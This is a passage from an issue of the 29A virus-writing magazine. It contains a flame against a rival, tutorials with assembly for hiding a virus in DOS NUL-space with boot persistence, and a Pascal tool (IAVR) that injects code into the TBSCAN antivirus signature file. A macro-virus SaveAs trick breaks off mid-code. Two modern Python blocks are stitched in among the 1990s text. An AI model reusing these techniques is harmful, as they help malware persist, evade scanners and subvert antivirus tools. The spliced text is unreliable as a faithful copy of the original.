contained, among others, a text file called "readme.1st", which
started this way:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]

% Important %
_____________

I do not give permission to anyone to publish this virus in their Vx
zine. This means the fools who published the source to Zhengxi, 6
months after it was made publicly available, and kept rambling on
about they were the zine to release the source.. they know who they
are. Also, ugly children are not permitted to read this text.

[...]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
It's a pretty curious thing to see what may ENVY drive
people to do. Well, it is obviously about us, 29A, who published
the original source code of Zhengxi in 29A#1, in december 1996.
That's why i decided to use this section of the magazine to reply
such a stupid quote. So keep on reading my
answer for the child, same as if it were an e-mail reply:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
From : Mister Sandman/29A
To   : The Soul Manager (previously known as *********)
About: Your big mouth

Hi fool.

> I do not give permission to anyone to publish this virus in their
> Vx zine

Do you think i'd ever publish anything from you in 29A? not in this
life...

> This means the fools who published the source to Zhengxi, 6 months
> after it was made publicly available, and kept rambling on about
> they were the zine to release the source..

You mean the same ones who kicked your ass? ah, yeh, it's us...
well, i don't really mind a shit what you think or don't, but i'll
try to make things clear for the rest of the people who are reading
this. Zhengxi was first publicly released in june 1996, but only in
its binary form. And it was only a few weeks before 29A#1 was
released, in december 1996, when some fortunate VXers could get the
original source code for it, and that's what we eventually
published, with the agreement of its author, as at that time Zhengxi
was so far the most asked-for virus in the scene. And that's why we
say we were the first zine to release the source, as it is the only
truth. No one else did it before. Maybe this reaction is the
consequence of a frustrated attempt to be you and your group the
first ones to publish it, heh?

> they know who they are.

In fact we even know who you are, despite your intention to hide
yourself under a new nick (The Soul Manager) and then talk shit
about us, instead of encouraging yourself to say what you think with
your original nick. Pathetic. With Zhengxi or without it, you're
still dead and i'm still Elvis.

Mister Sandman, chew my success.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
I would finally like
to add a brief text in latin, the language which gives (actually
gave) his nick to the dork i'm talking about, to describe what he
exactly makes me think and the way i feel every time i hear about
him. Those who can speak/translate latin will surely enjoy it a
lot.
"Qvotienscvmqve tvvm cognomen avdio navseas sentio,
qvotienscvmque tvos viros lego vomire volo, et vomiam ac mingam ac
concvlcabo sepvltvra tva, qvod ipsa sicvt cognomen tibi fvit, atqve
in ea reqviesces... cvm moriaris... si reapse aliqvando
vixisti".
Despite my initial intentions, i was about to forget about
publishing this article, so it would not stand between the
friendship of one of the VXers i admire most, now a 29A member, and
the "guy" this article is all about, but the thing went suddenly
fixed, as soon as i had noticed about the fact that the infamous
"Soul Manager" had broken his... friendship?, with this friend of
mine just because he'd joined 29A. Pretty curious meaning of
friendship. It would be very easy to be ok in the VX side, among us
all (not as between AVers, because they have economy standing
between their interests and them) in the virus scene, but it seems
that many people don't want it to be so. Oh, and... he's giving out
all his shit as he's now changing his nick again so keep your eyes
open and watch any dork you meet out. Fuck drugs off and get your
rage in your ass, idiot.
Mister Sandman, bring me a dream.
Article separator > Mister Sandman/29A

What is this article used for? The answer is nothing. Its
functionality is merely
esthetical, as it keeps the articles separated of the executable
files of the magazine. So why am i writing anything here? well,
there are still a few thingies which haven't been told in the rest
of the articles and result kinda interesting or funny to read. For
instance, do you know that: 666 * 3 = 1998? it seems like this is
gonna be a magic year for the VX side. Will AVers die? will they be
satanized? or will they maybe get medieval in their asses? who
knows :) Other thing you should note is the fact that we have not
included any virus index in this issue. It seemed to us pretty
stupid as they are described in detail both in their corresponding
source and in the "29A Labs", our website... describing them one
more time would be a pain. There are also one couple thingies
pending... the password for the secret area of our previous issue
was "29akewl". We accept no complains, we didn't have much
imagination at that time and were quite hurried, so... :P The other
pending thing is the importance of the new features of our improved
file browser. Now it is possible to load it with or without mouse,
with or without intro, and so on. And once loaded, when reading any
article, you will be able to choose between smooth or hard scroll.
Now it is also possible to run the payload of any virus included in
our zine when having loaded its source code from within the file
browser. It is still possible, btw, to UUdecode binary files,
albeit we have not implemented this feature yet. And finally, the
screen saver can be loaded now just by pressing a hot-key. And note
this is a DOS application, so we don't make responsible of the way
it may work under *your* Windows95. At least under ours it works
ok.
Optional parameters to 29A#2.EXE

  i........... Don't load intro (argh!)
  m........... Enable mouse inside browser
  s........... Disable smooth scroll

File browser internal commands

  #........... Activate screensaver
  b........... Activate boss screen
  g........... Run payload (if available)
  s........... Dis/able smooth scroll
  u........... UUdecode binary (i/a)
  F1.......... Further help (lame!)
Wish us some happy VX holidays and enjoy the zine!
Mister Sandman, bring me a dream.
Playing "Hide and Seek" > "Q" the Misanthrope

It is a game of
one-up-man-ship between the VX and the AV community. VX seems to be
winning this battle but is also forcing new improvements. VX
creates virus. AV creates scan strings. VX creates mutation. AV
creates smart detectors. VX creates stealth. AV counters that with
direct access. VX creates tunneling. AV stops that. VX creates
tracing. AV stumbles. VX creates retro. AV stumbles. VX creates
Stop AV from memory scanning. AV stumbles. VX creates macro
viruses. AV goes nuts. VX creates new places to hide from AV. AV
will probably stumble again.
Hide in NUL-Space

Wouldn't it be great to hide in a file that
could not be accessed. You can. There are little things called
device drivers in your PC. COM1, COM2, LPT1 and CON are examples.
NUL is also a device that serves little purpose except do nothing.
An example of this: COPY *.* NUL will read all the files for errors
and copy them into NUL-Space (nowhere). Try to create a file by the
name of NUL, what could you do with it? An experiment is necessary.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
c:\>debug
-a
mov ah,52
int 21
int 3
-g

AX=5200  BX=0026  CX=0000  DX=0000  SP=FFEE  BP=0000  SI=0000  DI=0000
DS=0C9C  ES=00C9  SS=0C9C  CS=0C9C  IP=0104   NV UP EI PL NZ NA PO NC
0C9C:0104 CC            INT     3
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
ES:BX points to the DOS list of lists. From Ralf Brown's interrupt
list:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Format of List of Lists:
Offset  Size      Description
 00h    DWORD     pointer to first Drive Parameter Block
 04h    DWORD     -> first System File Table
 08h    DWORD     pointer to active CLOCK$ device's header
 [...]
 22h    18 BYTEs  actual NUL device driver header (not a pointer!)
                  NUL is always the first device on DOS's linked
                  list of device drivers
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
ES:BX+22h is what is of interest. Back to debug.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-d es:48 l12
00C9:0040                          00 00 A6 C9 04 80 C7 0D           ........
00C9:0050  CD 0D 4E 55 4C 20 20 20-20 20                     ..NUL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
See the word NUL at es:bx+2Ch. Let's change it to AUTOEXEC.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-e es:52 "AUTOEXEC"
-q
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Back to DOS.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
c:\>type c:\autoexec.bat

c:\>ren c:\autoexec.bat test.bat
Path not found

c:\>del c:\autoexec.bat
Access denied
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Notice what
happened when AUTOEXEC.BAT was in NUL-Space. It could not be read,
renamed or deleted. Wouldn't this be a great way to protect our
virus. Ralf Browns list showed that the actual NUL device was only
18 bytes long. Could you just make another 18 byte NUL device by
another name? The answer is YES! Here is the device format from
Ralf Brown:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Format of DOS device driver header:
Offset  Size     Description
 00h    DWORD    pointer to next driver, offset=FFFFh if last driver
 04h    WORD     device attributes (see below)
 06h    WORD     device strategy entry point
                 call with ES:BX -> request header
 08h    WORD     device interrupt entry point
 0Ah    8 BYTEs  blank-padded character device name

Bitfields for device attributes:
 Bit(s)  Description
 15      set (indicates character device)
 14      IOCTL supported
 13      (DOS 3.0+) output until busy supported
 12      reserved
 11      (DOS 3.0+) OPEN/CLOSE/RemMedia calls supported
 10-8    reserved
 7       (DOS 5.0+) Generic IOCTL check call supported
 6       (DOS 3.2+) Generic IOCTL call supported
 5       reserved
 4       device is special (use INT 29 "fast console output")
 3       device is CLOCK$
 2       device is NUL
 1       device is standard output
 0       device is standard input
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
From the debug experiment:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
-d es:48 l12
00C9:0040                          00 00 A6 C9 04 80 C7 0D           ........
00C9:0050  CD 0D 4E 55 4C 20 20 20-20 20                     ..NUL
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
We see that the next device in the chain is at C9A6:0000h,
attributes are 8004h and that the strategy and interrupt entry
points are 00C9:0DC7h and 00C9:0DCDh. The strategy and interrupt
points for a NUL device just need to point to a RETF (they really
could point anywhere since they are not used). To make our own NUL
device we can do something like this:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
        mov     ah,52h                  ;get list of lists
        int     21h
        cld                             ;get address of next device in ds:si
        lds     si,dword ptr es:[bx+22h]
        push    cs                      ;point to our device
        pop     es
        mov     di,offset virus_device
        movsw                           ;copy device chain to our device
        movsw                           ;then hook in our device
        mov     word ptr ds:[si-02h],cs
        mov     word ptr ds:[si-04h],offset virus_device
[...]
virus_device    dd      -1h
                dw      8004h           ;NUL character attributes
                dw      return_far      ;strategy pointer
                dw      return_far      ;interrupt pointer
                db      "VIRUS   "      ;any file name you want in NUL-Space
[...]
return_far:     retf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
When your virus starts, have your
virus create a first generation virus whose host is the standard CD
20 (terminate immediately) before it starts infecting. Name that
virus C:\FDGDIKGA.PKB (pseudo random name and extension but should
be same for all infections on that PC). This name could be derived
from the drive C: serial number:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...]
        mov     ax,6900h                ;get drive serial number
        mov     bx,0003h                ;drive C:
        push    cs
        pop     ds
        mov     dx,offset info          ;point to where serial number will be
        int     21h
                                        ;create file name from the drive C: serial number
        cld
        mov     si,offset serialnumber
        mov     di,offset device_name
        mov     cx,0004h                ;loop 4 times
get_serial:
        lodsb                           ;get start of serial number
        push    cx
        mov     cl,04h                  ;inner loop 4 times
make_file:
        sub     al,cl
        ror     al,cl                   ;pseudo random letter
        mov     bl,al
        and     bl,0fh
        add     bl,"A"                  ;create letter from A to P
        mov     byte ptr ds:[di],bl
        inc     di                      ;save it and move pointer
        loop    make_file
        pop     cx
        loop    get_serial
        mov     byte ptr ds:[file_dot],"."      ;restore dot
        mov     byte ptr ds:[asciz_nul],00h     ;restore nul
        mov     dx,offset file_name     ;now create virus by name at DS:DX
[...]
info            dw      0
serialnumber    dd      0               ;drive C: serial number
                db      19 dup(0)       ;misc junk
file_name       db      "C:\"
device_name     db      "VIRUS000"      ;pseudo virus name goes here
file_dot        db      ".000"          ;with pseudo extension
asciz_nul       db      00h,00h,00h
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Hide it with the System and Hidden attribute, maybe even
Read-Only. Now create a NUL device by the name of FDGDIKGA (same as
pseudo random file name). Add this line to CONFIG.SYS:
INSTALL=C:\FDGDIKGA.PKB Now start infecting. Go memory resident
(you really only need to have the 18 bytes of your NUL device
resident). What will now happen is magic. When the PC reboots there
will load a program that doesn't have an executable extension so
most AV programs won't even try to scan it. If they do they won't
be able to read it or delete it because it is in NUL-Space. The AV
people will be able to add the scan string for your virus and
remove all the children created by it but they will not get the
virus in NUL-Space. It will continue to infect again and again.
Maybe only have it infect on Fridays or on the 13th of each month
so it will appear that the virus has gone away but later it
magically returns.
Hiding in NUL-Space and Windows 95

It works just fine with one notable exception; SCANDSKW.EXE that is
automatically launched by the System Agent detects that there is a
device by the same name as a file and will flag it. The solution is
simple. Create another NUL device by the name of SCANDSKW. This stops
SCANDSKW from working but doesn't flag an error. Note: when going
resident with the 18 byte NUL device, you might want to put it in the
same location as the AUX device. This device is never ever used and
is just wasting space. AUX is another name for COM1. PRN could be
used but some older programs actually use it. LPT3's 18 bytes also
could be used. The way to find the AUX device is to search the device
chain:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
        mov     ah,52h                  ;get list of lists
        int     21h
        add     bx,22h                  ;point to NUL device
check_end:
        cmp     word ptr es:[bx],-1     ;end of chain?
        je      end_chain
        cmp     word ptr es:[bx+0ah],"UA"       ;Look for "AUX "
        jne     next_device
        cmp     word ptr es:[bx+0ch]," X"
        jne     next_device
[...]                                   ;found AUX device at ES:BX
                                        ;change the name at ES:BX+0Ah
                                        ;to whatever you want
[...]
        mov     word ptr es:[bx+04h],8004h      ;set NUL device
        jmp     short end_chain
next_device:
        les     bx,dword ptr es:[bx]    ;get next device in chain
        jmp     short check_end
end_chain:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
To see the power of NUL-Space, try this in Windows 95: md\"NUL"
It locks the computer completely up.
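The check a defender wants against the trick above is the inverse of the search loop: walk the same chain from list-of-lists+22h, decode each 18-byte header exactly as Ralf Brown lays it out, and flag what the technique leaves behind. This is an added example, not code from the article: a Python walker over a constructed memory image that reports a non-NUL device carrying the 8004h NUL attribute, a renamed NUL at the head of the chain, a second NUL further down, and a device name that shadows a root-directory file (the collision the text says SCANDSKW notices). The addresses, the extra devices and the root-directory listing are made up for the sample.

```python
import struct

HEADER_LEN = 18                   # one DOS device driver header, per the layout quoted above
ATTR_CHAR = 0x8000                # bit 15: character device
ATTR_NUL = 0x0004                 # bit 2: "device is NUL"
LIST_OF_LISTS = (0x00C9, 0x0026)  # ES:BX from INT 21h/AH=52h in the article's debug run


def linear(seg, off):
    """Real-mode segment:offset to a flat index into the image."""
    return (seg << 4) + off


def parse_header(mem, seg, off):
    """Decode the header at seg:off, or return None if it lies outside the image."""
    base = linear(seg, off)
    if base + HEADER_LEN > len(mem):
        return None
    # next pointer is stored offset first, then segment (00 00 A6 C9 -> C9A6:0000)
    next_off, next_seg, attr, strat, intr = struct.unpack_from("<HHHHH", mem, base)
    name = mem[base + 10:base + 18].decode("ascii", "replace").rstrip()
    return {"addr": (seg, off), "next": (next_seg, next_off), "attr": attr,
            "strategy": strat, "interrupt": intr, "name": name}


def walk_chain(mem, lol_seg, lol_off, limit=64):
    """Follow the driver chain from the NUL header embedded at list-of-lists+22h."""
    seg, off = lol_seg, lol_off + 0x22
    devices, seen = [], set()
    while len(devices) < limit and (seg, off) not in seen:
        hdr = parse_header(mem, seg, off)
        if hdr is None:
            break
        seen.add((seg, off))
        devices.append(hdr)
        next_seg, next_off = hdr["next"]
        if next_off == 0xFFFF:        # offset FFFFh marks the last driver
            break
        seg, off = next_seg, next_off
    return devices


def find_suspicious(devices, root_files):
    """Return (name, reason) pairs for headers that match the NUL-space trick."""
    stems = {f.split(".")[0].upper() for f in root_files}
    findings = []
    for idx, d in enumerate(devices):
        if not d["attr"] & ATTR_CHAR:
            continue                  # block devices play no part here
        if idx == 0 and d["name"] != "NUL":
            findings.append((d["name"], "head of chain is not NUL (NUL renamed)"))
        if idx > 0 and d["name"] == "NUL":
            findings.append((d["name"], "second NUL device in chain"))
        if d["attr"] & ATTR_NUL and d["name"] != "NUL":
            findings.append((d["name"], "NUL attribute bit set on a non-NUL device"))
        if d["name"].upper() in stems:
            findings.append((d["name"], "device name shadows a root-directory file"))
    return findings


def scan_image(mem, root_files, lol=LIST_OF_LISTS):
    return find_suspicious(walk_chain(mem, *lol), root_files)


# --- constructed sample image; the addresses and names below are made up ------
def _put_header(mem, seg, off, nxt, attr, strat, intr, name):
    base = linear(seg, off)
    raw = struct.pack("<HHHHH", nxt[1], nxt[0], attr, strat, intr)
    mem[base:base + HEADER_LEN] = raw + name.ljust(8).encode("ascii")


def build_sample_image():
    """8 KiB image: NUL -> CON -> AUX renamed to SCANDSKW -> fake FDGDIKGA device."""
    mem = bytearray(0x2000)
    seg, off = LIST_OF_LISTS
    _put_header(mem, seg, off + 0x22, (0x0100, 0x0000), 0x8004, 0x0DC7, 0x0DCD, "NUL")
    _put_header(mem, 0x0100, 0x0000, (0x0100, 0x0020), 0x8013, 0x0010, 0x0016, "CON")
    _put_header(mem, 0x0100, 0x0020, (0x0120, 0x0000), 0x8004, 0x0020, 0x0020, "SCANDSKW")
    _put_header(mem, 0x0120, 0x0000, (0x0000, 0xFFFF), 0x8004, 0x0000, 0x0000, "FDGDIKGA")
    return mem


ROOT_FILES = ["AUTOEXEC.BAT", "CONFIG.SYS", "COMMAND.COM", "FDGDIKGA.PKB"]  # constructed

if __name__ == "__main__":
    for name, reason in scan_image(build_sample_image(), ROOT_FILES):
        print(f"{name:<8} {reason}")
```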
Hide in Cypher Text

PkZip has the ability to password protect ZIP files. This can be
used to our advantage. Have the virus run this:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
PKZIP -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
And add this to the AUTOEXEC.BAT:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
@ECHO OFF
PKUNZIP -O -SPASSWORD C:\VIRUS.ZIP C:\VIRUS.COM
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
This will allow multiple reinfections but the source will not be
found with a virus scanner because it will not be able to expand the
ZIP file. If this is over your head, save it and come back to it
when you are smarter. Have fun in NUL-Space.

Dear AV community, You are in check! It is now your move.
"Q" the Misanthrope
TBSCAN.SIG infection > Malware

TBAV uses so called AVRs in
order to add detection routines for catching polymorphic viruses
that avoid its generic decryption engine. Such an AVR is just
native code which is loaded and... executed! by TbScan, and is
stored along with the virus signatures in the signature file
TBSCAN.SIG. This signature file begins with a 128-byte-long header,
in which we can find the amount of 16-byte-long blocks (paragraphs)
needed by the AVRs at offset 70h, stored as a word (2 bytes). At
offset 72h is stored the overall size of the virus signatures, as a
doubleword. That's all we need to know about the TBSCAN.SIG header
in order to trojanize or infect it. The AVRs are located just after
the above contents in the file, and this is the place where our
virus or trojan has to be inserted. Since i do not know all the
specifications of it, we can just take what is already there and
modify it so there will be enough space for the new AVR code. Each
AVR has a 16-byte-long header. The word at offset 0ch of this AVR
header holds the size of the AVR code, including its header size.
Just after this header, the AVR code (which we'll describe later)
follows. And after this code we can find the virus name in ASCIIZ
format. The virus name size (including the ending 0) is stored in a
byte at offset 0ah of the AVR header. The total size
(header+code+name) is stored as well in a word at offset 0eh in the
header. Finally, the AVR code and the virus name are encrypted by a
bytewise xor with 44h. IAVR, the program included below, does all
this stuff so you can insert any code you want as an AVR in your
TBSCAN.SIG file. You just have to call it 'IAVR
filename_of_AVR_code'. If you don't specify any filename, IAVR will
keep on waiting for you to type in the AVR code. Then, after it has
read the code, IAVR will prompt for the virus name your AVR has to
be associated with. The new signature file will then be written to
a new file whose name will be TBS.SIG. And now, before including my
program IAVR, let's have a look at the format of any AVR code. It's
quite simply relocatable code. If it returns a carry flag, it's
telling TbScan that the virus was found. The AVR code has to be
ended with a retf instruction. The rest is just normal code, so you
can program as usual and insert anything you want there. This is an
example of an AVR which triggers all the files as infected:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
        .model  tiny
        .code
        org     100h
start:
        stc
        retf
        end     start
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
->8 And finally, the Pascal source of my IAVR program, which is
able to add any AVR to TBSCAN.SIG, writing the resulting file as
TBS.SIG. You can find the compiled executable version of this
program in the \FILES directory of this issue of 29A. - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
uses Crt;

const
  Name : String = 'Default_Virus';

type
  PWord = ^Word;

var
  F1,F2,F3   : File;
  ML,L,i,BP1 : word;
  OP,Size_   : LongInt;
  Buffer     : Array[0..$2200] of Byte;  { enlarged from $2000: a full $2000-byte AVR }
                                         { plus header and name would overrun it }

begin
  Size_:=0;
  assign(F1,'tbscan.sig'); Reset(f1,1);      { open original signature file }
  assign(F2,'tbs.sig');    rewrite(f2,1);    { create new signature file }
  assign(F3,ParamStr(1));  reset(F3,1);      { open file with code to insert }
  blockread(F1,Buffer,$80);                  { read header of signature file }
  blockwrite(F2,Buffer,$80);                 { and simply write it to new one }
  blockread(f1,buffer,$1fff);                { read first 1FFF byte of orig. }
  blockread(f3,buffer[$10],$2000,L);         { read upto 2000 byte of code }
  L:=L+$10;                                  { add size of header for AVR }
  Buffer[$0c]:=L and $FF;                    { write header size into buffer }
  Buffer[$0d]:=L div $100;
  Write('Name :'); Readln(Name);             { ask for a name for the virus }
                                             { thats detected by the new AVR }
  For i:=1 to Ord(Name[0]) do
    Buffer[L+I-1]:=Ord(Name[i]);             { write it into buffer }
  Buffer[L+Ord(Name[0])]:=0;                 { and end it with a zero }
  L:=L+Ord(Name[0])+1;                       { add length of name to size }
  Buffer[$0a]:=Ord(name[0])+1;               { store length of name }
  Buffer[$0e]:=L and $FF;                    { and full length of AVR }
  Buffer[$0f]:=L div $100;
  for i:=$10 to L do
    Buffer[I]:=Buffer[I] XOR $44;            { encrypt the new AVR }
  blockwrite(f2,buffer,L);                   { and write it to new sig.-file }
  ML:=L;
  seek(f1,$80);                              { seek back to top of original AVRS }
  { now write the rest of the original signature file to the new one }
  L:=$2000;
  While L=$2000 do
  Begin
    BlockRead(F1,Buffer,L,L);
    BlockWrite(F2,Buffer,L);
  End;
  Seek(F2,$80);                              { begin right after header again }
  Repeat
    OP:=FilePos(f2);                         { save position we have in file }
    blockread(f2,buffer,$1fff);              { read a bit from file }
    if Buffer[1]=$FF then                    { is it a control entry ? }
    begin                                    { yes, is control entry }
      for i:=$10 to Buffer[$0e]+word(buffer[$0f])*256 do
        Buffer[I]:=Buffer[I] XOR $44;        { decrypt it }
      i:=Buffer[$0c]+word(buffer[$0d])*256;  { ??? }
      OP:=OP+Buffer[$0e]+word(buffer[$0f])*256;       { add size of entry to }
                                             { position in file }
      Size_:=Size_+Buffer[$0e]+word(buffer[$0f])*256; { summarize all sizes }
      Seek(F2,OP);                           { seek to position after entry }
    end;
  Until Eof(F2) or ( Buffer[1]<>$FF );
  If Not( Eof(F2) ) then
  Begin
    BP1:=0;                                  { now the signatures }
    while (Buffer[BP1]<>0) do                { repeat until end of this }
    begin                                    { signature-block }
      Size_:=Size_+Buffer[BP1+8]+Buffer[BP1+7]+10;   { add size of entry }
      BP1:=Buffer[BP1+8]+$A+BP1+Buffer[BP1+7];       { here too }
      if BP1>=$1E00 then                     { we need a new part of file to }
      begin                                  { read sometimes }
        Seek(F2,OP+LongInt(BP1));
        OP:=OP+LongInt(Bp1);
        BlockRead(F2,Buffer,$2000);
        BP1:=0;
      end;
    end;
    Size_:=Size_+$81;                        { somehow 129 byte was missed }
    Seek(F2,$70);
    BlockRead(F2,Buffer,6);                  { read 6 byte from offset $70 }
    Seek(F2,$70);
    PWord(@Buffer[0])^:=PWord(@Buffer[0])^+((ML+15) DIV 16); { add para size of new AVR code }
    Buffer[2]:=Size_ and $FF;                { write new size of signatures }
    Buffer[3]:=(Size_ SHR 8) and $FF;
    Buffer[4]:=(Size_ SHR 16) and $FF;
    Buffer[5]:=(Size_ SHR 24) and $FF;
    BlockWrite(F2,Buffer,6);                 { write the 6 byte back to file }
  End;
  Close(F1); Close(F2); Close(F3);
end.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
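The record layout that IAVR writes, reconstructed in Python. This is an added example, not code from the page, from 29A or from ThunderByte: the field offsets ($0a name length, $0c/$0d header-plus-code length, $0e/$0f full record length, the $44 XOR of everything from $10 on, and the word/dword pair at $70 of the file header) are read off the Pascal program above; the sample AVR is the two-byte stc/retf routine from the page and the name is constructed. That byte 1 of the record is $FF is what IAVR keys on when walking the file, and it inherits it from the first original record; what the other header bytes mean, or whether TBSCAN itself uses the same test, is not known from the page and is treated as an assumption here.

```python
import struct

XOR_KEY = 0x44          # IAVR XORs the record body with $44: obfuscation, not encryption
HDR_LEN = 0x10          # record header; the AVR code starts at offset $10
FILE_HDR_LEN = 0x80     # TBSCAN.SIG file header, copied through untouched by IAVR
CONTROL_TAG = 0xFF      # IAVR recognises a control entry by byte [1] == $FF (assumption:
                        # IAVR reuses the first original record's header, so it inherits this)

# Constructed sample: the two-byte "every file is infected" AVR from the page (stc / retf)
SAMPLE_AVR_CODE = bytes([0xF9, 0xCB])
SAMPLE_NAME = "Default_Virus"   # IAVR's default name, reused here as the sample name


def build_avr_record(code: bytes, name: str, template_hdr: bytes = bytes(HDR_LEN)) -> bytes:
    """Lay out one AVR record as IAVR does: a patched 16-byte header, then the code,
    the name and a terminating NUL, everything from offset $10 on XORed with $44."""
    if len(template_hdr) != HDR_LEN:
        raise ValueError("record header must be 16 bytes")
    name_b = name.encode("ascii")
    if len(name_b) > 254:
        raise ValueError("name must fit a Pascal short string plus NUL")
    hdr = bytearray(template_hdr)
    hdr[1] = CONTROL_TAG
    code_len = HDR_LEN + len(code)              # Buffer[$0c..$0d]: header + code
    total_len = code_len + len(name_b) + 1      # Buffer[$0e..$0f]: whole record incl. NUL
    hdr[0x0A] = len(name_b) + 1                 # Buffer[$0a]: name length incl. NUL
    struct.pack_into("<HH", hdr, 0x0C, code_len, total_len)
    body = code + name_b + b"\x00"
    return bytes(hdr) + bytes(b ^ XOR_KEY for b in body)


def parse_avr_record(record: bytes):
    """Inverse of build_avr_record for one control entry: returns (code, name, total_len).
    Does the bounds checks that IAVR itself never does."""
    if len(record) < HDR_LEN or record[1] != CONTROL_TAG:
        raise ValueError("not a control entry")
    code_len, total_len = struct.unpack_from("<HH", record, 0x0C)
    if not (HDR_LEN <= code_len <= total_len <= len(record)):
        raise ValueError("length fields inconsistent with the data")
    body = bytes(b ^ XOR_KEY for b in record[HDR_LEN:total_len])
    if not body or body[-1] != 0:
        raise ValueError("record body is not NUL-terminated")
    code = body[:code_len - HDR_LEN]
    name = body[code_len - HDR_LEN:-1].decode("ascii")
    return code, name, total_len


def patch_file_header(file_hdr: bytes, new_record_len: int, sig_total: int) -> bytes:
    """Update the two counters IAVR rewrites at offset $70 of the file header: a word it
    increments by the new record's size in 16-byte paragraphs, and a dword holding the
    total size of the signature area (IAVR recomputes that by walking the new file)."""
    if len(file_hdr) != FILE_HDR_LEN:
        raise ValueError("file header must be $80 bytes")
    hdr = bytearray(file_hdr)
    paras = struct.unpack_from("<H", hdr, 0x70)[0] + (new_record_len + 15) // 16
    struct.pack_into("<HI", hdr, 0x70, paras & 0xFFFF, sig_total & 0xFFFFFFFF)
    return bytes(hdr)


def round_trip() -> bool:
    """Build the sample record and check that it decodes back to what went in."""
    rec = build_avr_record(SAMPLE_AVR_CODE, SAMPLE_NAME)
    return parse_avr_record(rec) == (SAMPLE_AVR_CODE, SAMPLE_NAME, len(rec))


if __name__ == "__main__":
    print("round trip ok:", round_trip())
```

The point worth keeping from the Pascal is visible in the Python: the "encryption" is a constant XOR and there is no checksum or signature over the record area, so whoever can write TBSCAN.SIG can append executable detection code that the scanner will run as its own.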
Malware
Macro virus trickz > Jacky Qwerty/29A This article is not
intended to be a tutorial for macro virus writin. It simply states
some common problemz and known limitationz with actual macro virii,
then sugests solutionz and provides some code examplez for them.
The reader should be already familiar with some of the conceptz
surroundin macro virii stuff. If not, i sugest to read first a
"real" tutorial about the subject and then jump back to this
article.
Index

    1. Introduction
    2. The "SaveAs" problem
    2.1. The "SaveAs" solution
    2.2. The "SaveAs" example
    3. The "MultiLanguage suport" problem
    3.1. The "MultiLanguage suport" solution
    3.2. The "MultiLanguage suport" example
    4. Final Note
    5. Disclaimer
1. Introduction One day while i was surfin the Web, unexpectedly
found a couple of linkz containin Word macro virii stuff. After
havin programed some DOS virii and researched about PE infection,
one has to admit that the idea of a virus writen in WordBasic or
VBA... mmm... well, sounds a bit stupid >8P (DS1, NJ: dont get
mad... >8D) Indeed, macro virii seem stupid once u write one,
but at that moment i had written none. After i downloaded and
played with some of them, i actually understood not only how stupid
macro virii were, but also Microsoft programerz. They're all
clueless on what *security* means :)
2. The "SaveAs" problem Just when i started to write my own
macro virus, my atention was caught by an interestin mesage posted
to alt.comp.virus. The topic was about that typical nuisance with
macro virii that reveals their presence: the "SaveAs" problem. As i
had thought, it was posible to overcome this, and that mesage from
an expert AVer (well ehem) had just confirmed it. The "SaveAs"
problem occurs when u try to save any infected document with
another name usin the "FileSaveAs" command. After the "SaveAs"
dialog box appears, u cant change the drive, nor the directory
path, nor the format type. Word always saves your document in the
"templatez" directory, unablin u to change it. This is bad for the
common clueless user and bad for the virus too, as it reveals its
presence by tellin him somethin is wrong. It also reduces its
chancez to spread coz now the user cant take home his (infected)
document as long as Word doesnt let him save documentz to his
floppy disk, due to the "SaveAs" problem. I have thought of
diferent wayz to overcome this, however i'll discuss the method i
actually implemented in my WM.CAP virus.
2.1. The "SaveAs" solution
How do we solve this problem then? easy, very easy once we
understand what an infected document really is. We cant forget that
an infected document is really a "template", that why Word doesnt
let us change the drive, nor the directory path, nor the format
type. Becoz its a "template" and templatez belong to the templatez
directory! Ok, but what if we make Word think that the infected
document, sorry i meant the infected "template", is a genuine Word
document? this would allow the user to select the drive, path and
any type for the document! right? right! but how? Easy again, once
we understand why Word provides "templatez": to make user's life
easier by creatin documentz based on such templatez, got it? All we
have to do is create a new document based on our active infected
template! in other wordz we have to "emulate" the "SaveAs" function
as if Word were saving a genuine document. Lets write some code to
ilustrate.
2.2. The "SaveAs" example

Sub FileSaveAs                                  ' Our "FileSaveAs" macro
    On Error Goto endFileSaveAs
    Dim dlg As FileSaveAs                       ' Declare dlg as FileSaveAs dialog box
    GetCurValues dlg                            ' Get current values into dlg
    If dlg.Format <> 1 Then                     ' Not a template? (i.e. not infected?)
